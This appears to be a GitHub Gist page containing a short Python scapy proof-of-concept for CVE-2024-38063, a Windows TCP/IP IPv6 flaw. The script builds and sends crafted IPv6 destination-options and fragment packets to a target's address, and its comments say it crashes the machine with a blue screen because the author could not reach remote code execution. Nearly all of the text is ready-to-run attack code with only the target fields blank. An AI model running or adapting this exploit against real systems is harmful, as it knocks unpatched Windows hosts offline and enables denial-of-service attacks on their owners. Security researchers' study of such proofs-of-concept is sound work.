Created
December 31, 2024 09:43
-
-
Save ThanniKudam/6d96d6468cb60f1787aecccd2aa3ba4d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Microsoft Windows: CVE-2024-38063: Windows TCP/IP Remote Code Execution Vulnerability | |
| #Couldn't find a way to escalate it to RCE (Skill Issues). This PoC will trigger BSoD :) | |
| from scapy.all import * | |
| IPAddr = '' # Target's IPV6 Address | |
| MACAddr = '' # Target's MAC Address | |
| ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)]) | |
| ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment() | |
| sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment